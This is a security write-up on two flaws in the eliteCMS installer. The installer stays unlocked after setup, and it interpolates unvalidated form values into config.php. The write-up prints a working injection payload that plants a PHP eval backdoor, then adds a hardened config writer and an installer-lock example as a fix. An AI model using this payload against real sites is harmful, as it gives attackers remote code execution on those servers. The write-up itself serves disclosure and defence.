After installation finishes, the eliteCMS installer is not locked, so an attacker can simply request the installer URL again and re-run the whole installation.

A second vulnerability: the installer writes a one-line PHP backdoor straight into admin/includes/config.php.

Let's look at the code:
...
elseif ($_GET['step'] == "4") {
    $file = "../admin/includes/config.php";
    // The config file is assembled as a string of PHP source; every DB
    // setting is interpolated straight from $_SESSION into that source.
    $write = "<?php\n";
    $write .= "/**\n";
    $write .= "*\n";
    $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
    ...omitted...
    $write .= "*\n";
    $write .= "*/\n";
    $write .= "\n";
    $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
    $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
    $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
    $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
    $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
    $write .= "if (!\$connection) {\n";
    $write .= " die(\"Database connection failed\" .mysql_error());\n";
    $write .= " \n";
    $write .= "} \n";
    $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
    $write .= "if (!\$db_select) {\n";
    $write .= " die(\"Database select failed\" .mysql_error());\n";
    $write .= " \n";
    $write .= "} \n";
    $write .= "?>\n";

    // The assembled source is written to config.php with no escaping at all.
    $writer = fopen($file, 'w');
    ...

Now look at where those session values come from:

// Earlier installer step: the form fields are copied into the session unchanged.
$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
$_SESSION['DB_USER'] = $_POST['DB_USER'];
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];

The values are taken over without any validation. If the database name POSTed to the installer is:

"?><?php eval($_POST[c]);?><?php

the string is interpolated verbatim into the define() line, and a one-line backdoor is written into /admin/includes/config.php. One caveat: the written file must still parse for the eval() to execute. The `?>` in this payload cuts off `define("DB_NAME", ""` before its closing parenthesis, so the statement ahead of the `?>` has to be terminated for PHP to load the file without a parse error. Combined with the unlocked installer, anyone who can reach the installer can plant this on a live site at any time.
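As an added example (not eliteCMS's own code), the config writer is shown below as a function next to a hardened version and an installer lock. The function names, the lock-file path and the PHP 7+ syntax are assumptions for this illustration; the payload string is the one from the write-up, fed in as constructed input.

```php
<?php
// Added example, not eliteCMS code. Assumes PHP 7 or later; paths and
// function names are chosen for this illustration only.

// Mirrors the installer's pattern: session values interpolated straight into
// PHP source. A value containing "?><?php ..." ends the string literal and
// the PHP block, and whatever follows it becomes live code in config.php.
function render_config_vulnerable(array $db): string
{
    $write  = "<?php\n";
    $write .= "define(\"DB_SERVER\", \"{$db['DB_SERVER']}\");\n";
    $write .= "define(\"DB_NAME\", \"{$db['DB_NAME']}\");\n";
    $write .= "define(\"DB_USER\", \"{$db['DB_USER']}\");\n";
    $write .= "define(\"DB_PASS\", \"{$db['DB_PASS']}\");\n";
    $write .= "?>\n";
    return $write;
}

// Hardened version:
//  1. host, database and user names must match a strict allow-list;
//  2. every value is emitted with var_export(), which yields a quoted and
//     escaped PHP literal, so "?>" or a quote inside the value stays data;
//  3. no closing "?>" is emitted, so nothing appended to the file later can
//     be interpreted as HTML followed by a fresh PHP block.
function render_config_safe(array $db): string
{
    foreach (['DB_SERVER', 'DB_NAME', 'DB_USER'] as $key) {
        // \z rather than $: $ would also match before a trailing newline.
        if (!preg_match('/^[A-Za-z0-9_.\-]{1,64}\z/', $db[$key] ?? '')) {
            throw new InvalidArgumentException("invalid value for $key");
        }
    }
    $write = "<?php\n";
    foreach (['DB_SERVER', 'DB_NAME', 'DB_USER', 'DB_PASS'] as $key) {
        $write .= 'define(' . var_export($key, true) . ', '
                . var_export((string)($db[$key] ?? ''), true) . ");\n";
    }
    return $write;
}

// Installer lock: refuse to write the config once install.lock exists, and
// create the lock right after writing. In a real installer the same check
// belongs at the top of install.php, before any step runs.
function write_config_once(string $configPath, string $lockPath, array $db): void
{
    if (file_exists($lockPath)) {
        throw new RuntimeException('installer is locked; remove the lock file to reinstall');
    }
    $source = render_config_safe($db);
    if (file_put_contents($configPath, $source, LOCK_EX) === false) {
        throw new RuntimeException("cannot write $configPath");
    }
    // 'x' mode creates the file exclusively, so two concurrent installs cannot both succeed.
    $lock = @fopen($lockPath, 'x');
    if ($lock === false) {
        throw new RuntimeException('lock file already exists');
    }
    fwrite($lock, date('c') . "\n");
    fclose($lock);
}

// Demonstration with the payload from the write-up (constructed input).
$payload = '"?><?php eval($_POST[c]);?><?php';
$db = [
    'DB_SERVER' => 'localhost',
    'DB_NAME'   => $payload,
    'DB_USER'   => 'root',
    'DB_PASS'   => 'secret',
];

echo "--- vulnerable output: contains a live PHP block ---\n";
echo render_config_vulnerable($db);

echo "--- hardened output: rejected by the allow-list ---\n";
try {
    echo render_config_safe($db);
} catch (InvalidArgumentException $e) {
    echo $e->getMessage(), "\n";
}

// Even without the allow-list, var_export() keeps the payload inside a
// single-quoted literal, where "?>" has no meaning to the parser.
echo "--- var_export() alone neutralises the string ---\n";
echo 'define(\'DB_NAME\', ' . var_export($payload, true) . ");\n";
```

Run it with `php example.php`. The vulnerable renderer reproduces a `<?php eval(...)` block in its output; the hardened one stops at the allow-list, and the last line shows that var_export() by itself already turns the payload into inert string data. Leaving out the trailing `?>` in the generated file is cheap extra insurance, and the lock check is what closes the first bug: without it, any hardening of step 4 can be bypassed simply by re-running the installer with different input.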